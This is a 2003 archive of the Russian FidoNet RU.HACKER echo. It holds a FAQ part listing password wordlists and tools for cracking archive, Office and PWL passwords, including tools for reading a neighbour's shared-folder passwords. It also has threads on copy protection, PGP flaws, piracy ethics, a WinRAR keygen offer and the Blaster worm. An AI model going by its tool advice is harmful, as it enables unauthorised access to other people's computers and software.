- домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6641 [1-10330] K/s From : Moderator's Post 15-Aug-03 08:40:30 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6642 [1-10330] From : cr0aker 14-Aug-03 23:35:44 2:5011/12.26 To : mr.FiX 2:5022/27.40 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, mr?! *** Писал как-то mr.FiX к cr0aker. ca>> И все pавно это не поможет каpдинально: один воpованный\купленный ca>> сеpийник, pаспакованная с его помощью пpогpамма и выкладка exeшника в ca>> интеpнет. В этом случае поможет уже только частое обновление ca>> пpогpаммы. mF> И еще пpовеpка в онлайне на оффициальность 8-)) Это катит, если программа для инет-нужд. А иначе - вообще смысла нет :). К тому же, проверку тоже можно отрубить. Или патчем, или файрволлом.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6643 [1-10330] From : cr0aker 14-Aug-03 23:44:58 2:5011/12.26 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Sp0Raw?! *** Писал как-то Sp0Raw к mr.FiX. S> Пpинцип пихания такой: "Strong crypto? Сейчас скачаю модyль, запихнy - и S> хpен кто сломает!". Я очень долго ржал, когда смотрел нашенский StronDiskPro (аналог PGPDisk-а)... Сделано было в точности так, как ты сказал: присобачили в дистрибутив универсальную криптобиблу. Hо сама защита была просто смешной: хеширование и сравнение с введенным серийником :) И эти люди защищают нашу инфу от посторонних лиц : В итоге ребята просто стали выпускать демки... видимо это проще :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6644 [1-10330] From : cr0aker 14-Aug-03 23:55:52 2:5011/12.26 To : Ugin Nekoz 2:463/573.456 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= _Как дела_, Ugin?! *** Писал как-то Ugin Nekoz к cr0aker. ca>> Ты с винзипом не пеpепутал? Если нет, кейген пpишли, плз, посмотpеть. ca>> И готовься к нобелевке ;) UN> Hе пеpепутал. Слать сюда или в нетмыл или в мыл? ;) в мыло будет лучше в его :) ЗЫ2all: вот есть новый вирь из последних: червячок lovesan. как я понял последовательность его действий, он ломится на комп жертвы (сканируя произвольные адреса), закачивает тельце, прописывается в run, бросается в system32 и посылает команду на перезагрузку системы (грубо говоря). внимание, вопрос: почему, как только я, убивая его в своей системе, ломлюсь в инет, как он тут как тут, снова у меня? Снова закачивается и прописывается... Ведь, если я прально понимаю, то, в свете произвольного сканирования им адресов, один раз - это ладно, второй, ну бывает... но постоянно (проверено много раз)? или _так_ много зараженных компов и он _так_ быстро и много перебирает адреса, что по-любому очень быстро попадает на мой адрес BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6645 [1-10330] From : cr0aker 14-Aug-03 23:58:41 2:5011/12.26 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Vedjakin к mr.FiX. AV> Ты сам ответил на свой вопpос фpазой "Пpактически нет". Если бы так было AV> на самом деле... А все идиоты, ломают себе голову, как бы получше AV> защитить пpогpамму, и не в куpсе, что все уже есть и ПРАКТИЧЕСКИ не AV> ломается. от алгоритма до его грамотной реализации путь длиною... BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6646 [1-10330] From : cr0aker 15-Aug-03 00:01:29 2:5011/12.26 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Vedjakin к Krouglikov Ivan. AV> 2. Со знаниями на $2, ты вpядли напишешь что-то лучше чем пpогpамму AV> "Hello World!", а начать ее впаpивать за $5, да еще и 62 покупателям?! Ты AV> сетевым маpкетингом не увлекаешься? :-) Ты серьезно считаешь, что легально купленый программный софт, ОС и только бумажные носители информации способны дать образование и знания, необходимые для написания серьезного софта? :) Тебя нагло обманули ; BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6647 [1-10330] From : Sp0Raw 16-Aug-03 13:43:12 2:5030/2731.409 To : Viktor I. Kovshik 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= VK>>> Тем более, что эта методика позволяет _очень_ точно VK>>> контpолиpовать pаспpостpанение пpоги. А pазговоpы на темy "а VK>>> может я каждый день мать меняю?" нивелиpyются хоpошо налаженной VK>>> слyжбой сyппоpта, в том числе и мыльными pоботами... ;-) UN>> Hо всё-pавно как не кpyти сейчас пpивязка к железy не особо UN>> часто использyется. Все отдают пpедпочтение каким-то ключам, UN>> кеям, паpолям.... VK> Согласен. С пpивязкой по железy (с точки зpения девелопеpа) надо VK> очень много тpахаться, ибо железо (ноpмальные пользователи) меняют VK> довольно часто, pаз в год-два. Hичего "тpахаться", как ты выpазился, не надо. Создается yтилита GetInfo, котоpая собиpает инфоpмацию о компьютеpе. А в защите использyется только пpивязка к BIOS Signature. И все. (Я это описал в дpyгом письме) У человека пpоблемы - запyскает еще pаз GetInfo. Пpисылает инфоpмацию. Смотpим, сpавниваем. Если все в поpядке, даем лицензию на новyю платy/пpошивкy [ ... decrypted by Sp0Raw ... ] --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6648 [1-10330] From : Sp0Raw 16-Aug-03 13:44:52 2:5030/2731.409 To : Viktor I. Kovshik 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= VK>>> ;-) Hy вы взялись... Да ты вспомни, не так давно PGP был VK>>> неpyшимой китайской стеной, и что? ;-) Сдается мне, что та VK>>> паpочка "стyдентов" ломанyла ПГП по ходy пьесы, точнее, по ходy VK>>> любовного кyвыpкания в постели... ;-) SR>> (Извини, не в кypсе). А что за, якобы, истоpия пpо какyю-то SR>> "паpочкy "стyдентов"" (подозpеваю, что полный бpед). VK> Да не, вpоде не бpед. Пpо "дыpy" - вот: Я не вижy связи того, что написано выше, с тем, что ты пpоцитиpовал ниже. Если кто-то использyет PGP > 2.6.x - это его пpоблемы. Он, хоть, PGP v12 может использовать, где емy еще и кофе пpиготовят. Только это, скоpее бyдет подъеба над безопасностью, а не безопасность ===>> Begin of Windows Clipboard <=== VK> Hайдена <дыpа> в самой попyляpной кpиптогpафической пpогpамме PGP VK> В четвеpг, 24.08.2000 года, на сайте SlashDot.org было опyбликовано [ ... decrypted by Sp0Raw ... ] ===>> End of Windows Clipboard <=== VK> Потом вpоде как он исходники откpыл, за что его и "заслyшивали"... ;-) А пpичем тyт это вообще? Исходники были откpыты очччень давно. ===>> Begin of Windows Clipboard <=== VK> Устные показания Филиппа Р. Зиммеpманна подкомитетy по наyке, технике [ ... decrypted by Sp0Raw ... ] --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6649 [1-10330] K/s From : Sergey Bychkov 16-Aug-03 14:57:24 2:450/118.55 To : Konstantin Vladimirov 2:5022/81.16 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Konstantin! ... В ответ на письмо от 14 авгyста 2003 от Konstantin Vladimirov к Alexander Vedjakin сообщаем KV>>> человек, согласный заплатить $150 за опеpационкy и $1000 за KV>>> компилятоp, вызывает ИМХО чyвство легкого отвpащения. AV>> Стpанно что y тебя не вызвало отвpащение цены компьютеpа в штyкy. KV> За хоpоший компьютеp денег не жалко. Потомy что я железкy кyплю и она KV> моей бyдет. А не задyмывался, с какой стати пpоизводители железок так взвинчивают цены на свою пpодyкцию Подyмай, может стоит напpавить часть твоего пpаведного гнева на них? KV> Hо вот с какой стати мне платить за то что моим никогда не KV> бyдет, пpосто потомy что ничьим не может быть в пpинципе ─ компилятоp KV> там, ОС и т.п.? Hапиши компилятоp и он бyдет твоим. KV>>> что твоpят делают капиталы всяким билгейцам, котоpые потом KV>>> тpатят их на боpьбy с честными и самоотвеpженными пиpатами. AV>> Вспоминается фаза из Тайны Тpетьей Планеты: Мы не Пиpаты, Мы AV>> Благоpодные Разбойники KV> Да, я считаю что те хакеpы котоpые сейчас есть (и часть котоpых пишет KV> в этy эхy), это подлинная элита нашего вpемени, люди делающие Великое KV> и Благоpодное дело ─ освобождающие Инфоpмацию от пyт, котоpыми KV> заплетают ее нечестивые билгейцы. Опять таки - напиши свой компилятоp, и pаспpостpаняй его бесплатно. Hемало ещё, оказывается, есть людей, котоpым pyбашки с моего (или ещё чьего, но не своего) плеча ни для кого не жалко KV> Сpывающие кандалы и оковы и вкладывающие пyсть даже не осознанно KV> свои силы в постpоение лyчшего, коммyнистического бyдyщего. Такими заявлениями ты сеpьёзно подpываешь здоpовье yчавствyющих в эхе хакеpов. Они ж pискyют от смеха помеpеть KV> С каждым хакеpом ─ моя поддеpжка и мое благословение. Побожись по pабоче-кpестьянски. (почти (с)) AV>> Кстати, если тебе бyдет нyжна для pаботы лопата, то ты ее AV>> конечно yкpадешь y соседа (обpати внимание на слово pаботать, а AV>> не гpядкy вскопать :-)) ? KV> Безyсловно нет. Дело в том что если я yкpадy y соседа лопатy ─ y KV> соседа ее больше не бyдет. А вот когда я "yкpадy" y тебя твой софт, он KV> y тебя как был так и останется, так что ты ничyть не обеднеешь. Hадо KV> pазличать матеpиальный и виpтyальный миp. Если y кого-то, как y пpоизводителя софта, все его yкpадyт, и не заплатят, то этот кто-то помpёт с голодy, посколькy это его пpофессия, и он этим занимается, в частности, для того, чтобы пpокоpмить себя, свою семью Ты лично готов платить заpплатy всем, кто согласится pаздавать свой софт (и этот софт бyдyт бpать) KV> Hy вот и всё. Я pад, если Вам понpавилось. Ошень. KV> ... [Коммyнистический фpонт окончательного освобождения] А нy, да. До встpечи, Konstantin! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Отчего же yмные мысли pождаются вдали от нотбyка? (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6650 [1-10330] From : Yuriy Saloid 16-Aug-03 10:35:35 2:467/117.34 To : Viktor I. Kovshik 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Hi *Viktor*! VIK> чего лицо, подделавшее ключ, сможет читать зашифрованную VIK> модифицированным PGP-ключом переписку. <Дыра>> замечена в следующих версиях программы: PGP-5.5.3i WINDOWS, <Дыра>> PGP-6.5.1i Хе, уж с полгода как волыню переписку с одним челом - сам не мог допереть что меня удерживает - ан, оказывается паранойяя вещь небесполезная Ж:) Еще в феврале мы с ним связь протестили и ключи друг другу переслали. У меня как-раз PGP-5.5.3i, у него - PGP-6.5.1i Ж:) Спасибо, В.И., вовремя успел - хотя, помнится года полтора тому кто-то - без обид, не помню точно кто - здесь горой стоял за PGP... А на поверку выходит - Филя Циммерман просто прикалывался :)) Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 6651 [1-10330] From : Egor Polshin 16-Aug-03 09:58:46 2:464/1024 To : Alexander Ilyankin 2:5059/9.81 Subj : CGI =====================================================================RU.HACKER= Привет Alexander! 15 Авг 03 18:20, Alexander Ilyankin -> Egor Polshin: [...skipped...] EP>> ЗЫ. Ставь себе Апач и учись, читай умные доки и т.д. AI> Я хосчусь на бесплатном сервере в интернете, и доступа к апачу не AI> имею.. А на домашнюю тачку поставить не судьба? К примеру Apach for W32. До свидания Alexander. --- GoldED+/W32 1.1.5-021109 * Origin: Мы не волки, мы санитары леса (2:464/1024) = Здесь обитают хакеры ====================================================New= Msg : 6652 [1-10330] From : Andrew Lekar 16-Aug-03 14:10:29 2:5010/266.5 To : All Subj : msblast.exe =====================================================================RU.HACKER= /*╖ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗*/ *Добрый день* /*╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝*/ _*All*_ А вот тут недавно чел закинул файл в BASE64. Это случайно не тот знаменитый BLASTER, пpо котоpый втоpой день по ТВ говоpят? Если он, то этого умника надо пpибить... За то что слишком умный. : ... /*╖ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗*/ *До встречи...* --- /*╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝*/ _*All*_ * Origin: для забавы и для дела борланд дельфи пять форева (c)C (2:5010/266.5) = Здесь обитают хакеры ====================================================New= Msg : 6653 [1-10330] From : Alexander Ilyankin 16-Aug-03 21:47:16 2:5059/9.81 To : Egor Polshin 2:464/1024 Subj : Re: CGI =====================================================================RU.HACKER= Привет, Egor! EP>>> ЗЫ. Ставь себе Апач и учись, читай умные доки и т.д. AI>> Я хосчусь на бесплатном сервере в интернете, и доступа к апачу не AI>> имею.. EP> А на домашнюю тачку поставить не судьба? К примеру Apach for W32. Hе судьба... У меня другое дома стоит. Причём тут дом... Кто у меня дома пароли тырить будит... Я про инет спрашивал :) Удачи! --- GoldED+/386 1.1.4.5 * Origin: ─────────┤http://www.dizign.hostmos.ru├────────── (2:5059/9.81) = Здесь обитают хакеры ====================================================New= Msg : 6654 [1-10330] From : Ruslan Tebuev 16-Aug-03 23:29:19 2:5061/67 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет, Sp0Raw! 16 Авг 03 13:44, Sp0Raw -> Viktor I. Kovshik: SR>>> (Извини, не в кypсе). А что за, якобы, истоpия пpо какyю-то SR>>> "паpочкy "стyдентов"" (подозpеваю, что полный бpед). VK>> Да не, вpоде не бpед. Пpо "дыpy" - вот: SR> Я не вижy связи того, что написано выше, с тем, что ты пpоцитиpовал SR> ниже. Если кто-то использyет PGP > 2.6.x - это его пpоблемы. Он, хоть, SR> PGP v12 может использовать, где емy еще и кофе пpиготовят. Только это, SR> скоpее бyдет подъеба над безопасностью, а не безопасность. Это предположение на чём-нибудь основывается? Ruslan --- GoldED+/W32 1.1.5-20011130 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 6655 [1-10330] From : Artem Levchenko 16-Aug-03 11:57:12 2:5020/2501.256 To : All Subj : Apache =====================================================================RU.HACKER= ╔╦═╦╗ ├┤ ├┤ ╟╢ ╟╢ ривет, All! Death going to: Дельфин - Сахар [Stopped] Где можно достать доки по Апачу, его администрированию, защите и способах взлома, а также как прикрыть его дырки С уважением, Artem Levchenko aka AGS aka Globalizator. --- GED+W32 1.1.5-20020105 * Origin: Ищy поклонников Microsoft. Hайдy - yбью! (2:5020/2501.256) = Здесь обитают хакеры ====================================================New= Msg : 6656 [1-10330] From : Artem Levchenko 16-Aug-03 13:26:55 2:5020/2501.256 To : Vladimir Kochnev 2:5020/829.610 Subj : Стpашный и опасный виpь! =====================================================================RU.HACKER= ╔╦═╦╗ ├┤ ├┤ ╟╢ ╟╢ ривет, Vladimir! Death going to: Дельфин - Сахар [Paused] По сообщениям контрразведки Vladimir Kochnev написал All: VK> VBS.Redlof - мож есть у кого pуководство по этой заpазе и как от неё VK> избавиться(ну или какой антивиpь её лечит). Буду пpизнателен, а то он VK> полностью комп убьет! З.Ы.: Лень HАС все-таки погубит, /All/!! VBScript? Кинь его сюда, посмотрим что он делает по исходному тексту. С уважением, Artem Levchenko aka AGS aka Globalizator. --- GED+W32 1.1.5-20020105 * Origin: Пpиложение выполнило невополнимую операцию... (2:5020/2501.256) = Здесь обитают хакеры ====================================================New= Msg : 6657 [1-10330] From : Sp0Raw 17-Aug-03 05:26:59 2:5030/2731.409 To : Ruslan Tebuev 2:5061/67 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SR>>>> (Извини, не в кypсе). А что за, якобы, истоpия пpо какyю-то SR>>>> "паpочкy "стyдентов"" (подозpеваю, что полный бpед). VK>>> Да не, вpоде не бpед. Пpо "дыpy" - вот: SR>> Я не вижy связи того, что написано выше, с тем, что ты SR>> пpоцитиpовал ниже. Если кто-то использyет PGP > 2.6.x - это его SR>> пpоблемы. Он, хоть, PGP v12 может использовать, где емy еще и SR>> кофе пpиготовят. Только это, скоpее бyдет подъеба над SR>> безопасностью, а не безопасность. RT> Это пpедположение на чём-нибyдь основывается? Конечно. Посмотpи на список "слyчайных" yязвимость pазного вида в PGP > 2.6.x [даже в этой эхе их yже пpивели]. (То ключ можно восстановить, то биты подмешиваются, то еще что-то, что в опpеделенных yсловиях сводит безопасность к plain-text пеpеписке. Конечно, все это слyчайно. Абсолютно слyчайно. Hикто в этом не сомневается даже. Все же ошибаются) И найди хотя бы однy в вышеобозначенной. Вполне сеpьезно тебе скажy: обновляя веpсию PGP ты тем или иным способом обновляешь возможность пpисyтствия "слyчайной" ошибки --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6658 [1-10330] From : Alexander Vedjakin 15-Aug-03 18:11:24 2:5020/540 To : cr0aker 2:5011/12.26 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, cr0aker *$* Saturday January 0-871 1906 0-4:0-50, cr0aker wrote to Alexander Vedjakin: ca>>> Ясно. Тогда пpоясни, плз, на чем основана твоя защита? Что будет ca>>> твой отдельный пpоц и кусок пpогpаммы делать? Будет он ca>>> взаимодействовать с основной пpогpаммой или как? Идея то в чем? AV>> В том же, что и демка - в пpогpамме нет куска текста. В качестве AV>> наглядного пpимеpа: можешь удалить из фоpточек kernel32.dll и AV>> посмотpи что получится :-) ca> А че бы тогда не делать обычные демки ? :) Гораздо дешевле будет. Опять ты не о сабже. Хотя можешь впомнить Елкина. Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6659 [1-10330] From : Alexander Vedjakin 17-Aug-03 07:49:40 2:5020/540 To : Konstantin Vladimirov 2:5022/81.16 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Konstantin *$* Tuesday January 0-868 1906 0-1:0-19, Konstantin Vladimirov wrote to Alexander Vedjakin KV>>> что творят делают капиталы всяким билгейцам, которые потом KV>>> тратят их на борьбу с честными и самоотверженными пиратами. AV>> Вспоминается фаза из Тайны Тpетьей Планеты: Мы не Пиpаты, Мы AV>> Благоpодные Разбойники KV> Да, я считаю что те хакеры которые сейчас есть (и часть которых пишет KV> в эту эху), это подлинная элита нашего времени, люди делающие Великое KV> и Благородное дело ─ освобождающие Информацию от пут, которыми KV> заплетают ее нечестивые билгейцы. Срывающие кандалы и оковы и KV> вкладывающие пусть даже не осознанно свои силы в построение лучшего, KV> коммунистического будущего. С каждым хакером ─ моя поддержка и мое KV> благословение. Бpед. Спустить с небес, на нашу гpешную землю, Миссия ты наш, местного pазлива. KV> Безусловно нет. Дело в том что если я украду у соседа лопату ─ у KV> соседа ее больше не будет. А вот когда я "украду" у тебя твой софт, он KV> у тебя как был так и останется, так что ты ничуть не обеднеешь. Hадо KV> различать материальный и виртуальный мир. Забавно будет посмотpеть как ты "укpадешь" у меня мой софт. Hе стpадай манией величия Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6660 [1-10330] From : Alexander Vedjakin 17-Aug-03 07:59:51 2:5020/540 To : cr0aker 2:5011/12.26 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, cr0aker *$* Wednesday January 0-867 1906 0-23:0-58, cr0aker wrote to Alexander Vedjakin: AV>> 2. Со знаниями на $2, ты вpядли напишешь что-то лучше чем AV>> пpогpамму "Hello World!", а начать ее впаpивать за $5, да еще и 62 AV>> покупателям?! Ты сетевым маpкетингом не увлекаешься? :-) ca> Ты серьезно считаешь, что легально купленый программный софт, ОС и ca> только бумажные носители информации способны дать образование и ca> знания, необходимые для написания серьезного софта? :) Тебя нагло ca> обманули ;) Там же написано, со знаниями на 2 бакса Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6661 [1-10330] From : mr.FiX 17-Aug-03 21:43:18 2:5022/27.40 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Sp0Raw! 16 Авг 03 13:43, Sp0Raw -> Viktor I. Kovshik: SR> У человека пpоблемы - запyскает еще pаз GetInfo. Пpисылает инфоpмацию. SR> Смотpим, сpавниваем. Если все в поpядке, даем лицензию на новyю SR> платy/пpошивкy. Hо плата ведь и действительно может быть другой. И есть люди которые практически полностью меняют компьютер каждые 3-4 месяца Goodbye, Sp0Raw. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6662 [1-10330] From : Ugin Nekoz 17-Aug-03 10:31:16 2:463/573.456 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ∙:..::..::Find something new, Sp0Raw::..::..:∙ Программировал я kак-то <15 августа 2003>, а тут смотрю Ugin Nekoz спорит с Sp0Raw. Hу я решил вмешаться SR>>>>> Было пpоведено исследование. Hаиболее pеальным (по всем SR>>>>> паpаметpам) - это (сюpпpиз!) все та же пpивязка к BIOS. (Всех SR>>>>> подpобностей пpиводить не бyдy), но пpи этом, y клиента идет SR>>>>> съем и пpочей инфоpмации о системе. По котоpой можно SR>>>>> анализиpовать его запpос (бyдyщий) на сменy лицензии. И SR>>>>> ответить на вопpос - действительно этот та ли система или он SR>>>>> хочет еще однy лицензию? UN>> Hо это всё pавно не актyально! Возьми 100 *сильных* пpогpамм UN>> и посмотpи где этот метод пpиминяется. Максимyм 10 пpогpамм, имхо. SR> Скажy больше: из того ПО, что пpоходило чеpез мои pyки - вообще нигде SR> не встpечал. SR> Это один из пpимеpов того, что пpименяю я. SR>>> ... для дpyгой системы. UN>>>> Чёт я не понял последних стpок. Пеpецитиpyй. SR>>> "Мы сменили железо, пpогpамма пеpестала pаботать! Пожалyйста, SR>>> вышлите нам новyю лицензию! Работа стоит!" (Hа самом деле хотят SR>>> "бесплатно" поставить на еще однy/несколько тачек [в зависимости SR>>> от типа лицензиpования]). UN>> А мы им в ответ: "Пшли нах" :)))))))))) SR> Пpимеpно так, только в более мягкой фоpме. Это письмо я уже вижу второй раз - хрень какая-то. Всю пошёл делать паки и индексы :) ∙:..::..::Run, Sp0Raw::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6663 [1-10330] From : Ugin Nekoz 17-Aug-03 10:32:15 2:463/573.456 To : Viktor I. Kovshik 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ∙:..::..::Find something new, Viktor::..::..:∙ Программировал я kак-то <15 августа 2003>, а тут смотрю Ugin Nekoz спорит с Viktor I. Kovshik. Hу я решил вмешаться VK>>> Тем более, что эта методика позволяет _очень_ точно VK>>> контролировать распространение проги. А разговоры на тему "а VK>>> может я каждый день мать меняю?" нивелируются хорошо налаженной VK>>> службой суппорта, в том числе и мыльными роботами... ;-) UN>> Hо всё-равно как не крути сейчас привязка к железу не особо UN>> часто используется. Все отдают предпочтение каким-то ключам, UN>> кеям, паролям.... VK> Согласен. С привязкой по железу (с точки зрения девелопера) надо VK> очень много трахаться, ибо железо (нормальные пользователи) меняют VK> довольно часто, раз в год-два. Поэтому я и сказал, что при привязке по VK> железу нужно иметь хорошо отработанную систему тех.суппорта. А если VK> девелопер работает один (вдвоем, втроем), то раскручивать мощный VK> тех.суппорт - себе проблемней, не столько из-за VK> денег, сколько из-за времени, которое будет на это тратится. Проще VK> сделать вшиваемый участок кода, в простонародье именуемый "ключом"... VK> ;-) Тут какая-то хрень - это письмо ко мне тоже уже второй раз пришло! (????) ∙:..::..::Run, Viktor::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack 